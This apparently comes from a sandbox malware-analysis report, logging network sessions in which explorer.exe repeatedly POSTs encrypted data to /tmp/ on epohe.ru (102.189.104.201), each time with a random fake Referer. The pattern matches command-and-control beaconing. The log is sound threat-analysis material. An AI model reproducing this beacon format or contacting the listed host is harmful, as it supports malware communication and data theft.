Sep 2, 2024 11:42:30.981898069 CEST	287	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 55 47 be f3 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuUG[B@EMVE=yTVdWC3RzUQvsQE<jD?J[y;/rU9!@SAD/-n\`2@h )F)
Sep 2, 2024 11:42:32.132819891 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Sep 2, 2024 11:42:32.133090019 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:32.144936085 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oerusfyadyvfpmjm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: epohe.ru
Sep 2, 2024 11:42:32.144970894 CEST	271	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 61 4c f0 aa Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuaL^)msGg4pnsN-0lfKC9VV7VSgG32q_3o][x5];&UC!I]'p+wP_6l
Sep 2, 2024 11:42:33.076257944 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:33.085263968 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nbmnkedntct.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: epohe.ru
Sep 2, 2024 11:42:33.085287094 CEST	313	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5e 46 eb b8 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu^Fo1:Syvmr."h!*.8{GUNGx`(%I RD?DU-nSFhY0klECn/if9Qo
Sep 2, 2024 11:42:34.012614965 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:33 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:34.020538092 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://esdminlvrkeqcklx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: epohe.ru
Sep 2, 2024 11:42:34.020560026 CEST	188	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 6e 39 da ec Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vun9qWoO>r$Cmu22_;o-4]W:2oOM7Bo\V@O7a
Sep 2, 2024 11:42:34.926078081 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:34.934243917 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yrljtsnfbvqitue.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 246 Host: epohe.ru
Sep 2, 2024 11:42:34.934336901 CEST	246	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 7e 20 ab 82 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu~ V_i%'SWaauhGPI^!GGh?{a>\4vmje}C2/#sdU8CuIwdGw
Sep 2, 2024 11:42:35.855348110 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:35 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:35.887342930 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wddxovmhfhdjjf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229 Host: epohe.ru
Sep 2, 2024 11:42:35.887362957 CEST	229	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 72 0a e1 85 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vurm=^Ymtad+!>MgIhddR%+W&SXYsy)O`qZ2>(:<'h]%S)4;Bd
Sep 2, 2024 11:42:36.812870979 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:36 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:36.826921940 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mroqivvlsgi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 281 Host: epohe.ru
Sep 2, 2024 11:42:36.826939106 CEST	281	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 53 5d b6 a7 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuS]fAhb")V1D4f~+&>PV<NY; Lv[P`BZ4h-\K.{<}Hm(UMF](z.1
Sep 2, 2024 11:42:37.744398117 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:37.752362013 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sloulillyitjtj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: epohe.ru
Sep 2, 2024 11:42:37.752388000 CEST	128	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 51 00 fb b8 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuQn/bCum\|Y;ss09
Sep 2, 2024 11:42:38.679538012 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:38.766779900 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ldwswurfvgvwu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: epohe.ru
Sep 2, 2024 11:42:38.766807079 CEST	197	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 23 5c b5 f5 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu#\PEW;5'b%Wfo7D:`W48xsV&,+[/z)V3`cl
Sep 2, 2024 11:42:39.714164019 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:39 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:39.728411913 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://poatfeiydcmxgiom.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: epohe.ru
Sep 2, 2024 11:42:39.728432894 CEST	358	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 39 2c c5 ab Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu9,V5^;QZwi~.XZsA=vQKkDv*sz2\|c! }INbVQlSravJ.Mc[R/
Sep 2, 2024 11:42:40.626892090 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:40.637253046 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mhwdtchfjlofmuv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: epohe.ru
Sep 2, 2024 11:42:40.637279034 CEST	247	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 61 37 f1 81 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vua7dOGgdkBd)\|<,J"9r{B,;Dzt$j;8<<_Ib*j`4?60ej>?Ukd9DB"
Sep 2, 2024 11:42:41.556263924 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

